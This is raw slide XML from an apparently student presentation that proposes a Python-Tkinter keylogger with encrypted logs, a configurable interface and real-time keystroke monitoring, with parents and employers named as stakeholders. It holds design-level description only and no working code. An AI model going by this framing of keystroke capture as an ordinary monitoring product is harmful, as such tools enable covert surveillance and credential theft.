                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Franklin Gothic Demi"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Development of educational resources and training programs to raise awareness about cybersecurity risks and promote responsible usage of keylogger applications.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Title 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535680" y="844560"/>
            <a:ext cx="11029320" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Future scope</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN"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rmAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="1302120"/>
            <a:ext cx="11029320" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="305280" indent="-305280" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="2400" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://github.com/techtrainer20/TNSDC</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="305280" indent="-305280" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>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endParaRPr b="0" lang="en-US" sz="24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1463040" y="2766240"/>
            <a:ext cx="9298440" cy="1325160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2800" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>THANK YOU</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>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849600" y="558360"/>
            <a:ext cx="10515240" cy="1325160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2800" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>OUTLINE</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="586440" y="1618920"/>
            <a:ext cx="11018520" cy="5238720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>  </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Problem Statement </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Proposed Solution </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System </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Development Approach</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </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Algorithm &amp; Deployment  </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Result </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Conclusion</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Future Scope</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References</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="17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rmAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Problem Statement</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581040" y="702000"/>
            <a:ext cx="11029320" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr lvl="1" marL="629280" indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="629280" indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="629280" indent="-305280" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>In the era of digital transformation, cybersecurity threats pose significant risks to individuals and organizations worldwide. One such threat is the unauthorized access to sensitive information through keystroke logging, where malicious actors can capture keystrokes to obtain passwords, personal data, and other confidential information. Existing keylogger solutions often lack adequate security measures and user-friendly interfaces, leaving users vulnerable to cyber attacks and privacy breaches.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="629280" indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="629280" indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="18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rmAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Proposed Solution</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578880" y="1440000"/>
            <a:ext cx="11613240" cy="5563440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>To address the challenges posed by keystroke logging threats, we propose the development of an advanced Python-Tkinter based keylogger application with enhanced security features and usability. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="306000" indent="-306000" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1cade4"/>
              </a:buClr>
              <a:buSzPct val="92000"/>
              <a:buFont typeface="Wingdings 2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>This keylogger will employ sophisticated encryption techniques to protect captured data and ensure user privacy. Additionally, it will offer an intuitive and customizable user interface, allowing users to easily configure settings and monitor keyboard activity in real-time. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="306000" indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="18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581040" y="662400"/>
            <a:ext cx="11029320" cy="529920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="b">
            <a:normAutofit fontScale="74983" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="4400" spc="-1" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Franklin Gothic Demi"/>
              </a:rPr>
              <a:t>System  Approach</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180000" y="1800000"/>
            <a:ext cx="12060000" cy="4672800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" rIns="91440" tIns="45720" bIns="45720" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="601"/>
              </a:spcAft>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0f0f0f"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325440" y="1079280"/>
            <a:ext cx="11229480" cy="5707800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" wrap="none" lIns="0" rIns="0" tIns="198360" bIns="198360" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>The following is the development approach for the new keylogger:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-IN" sz="1100" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Requirement Analysis: Understand stakeholder needs, such as parents and employers, </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1191"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="992"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buFont typeface="OpenSymbol"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>and define keylogger requirements.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
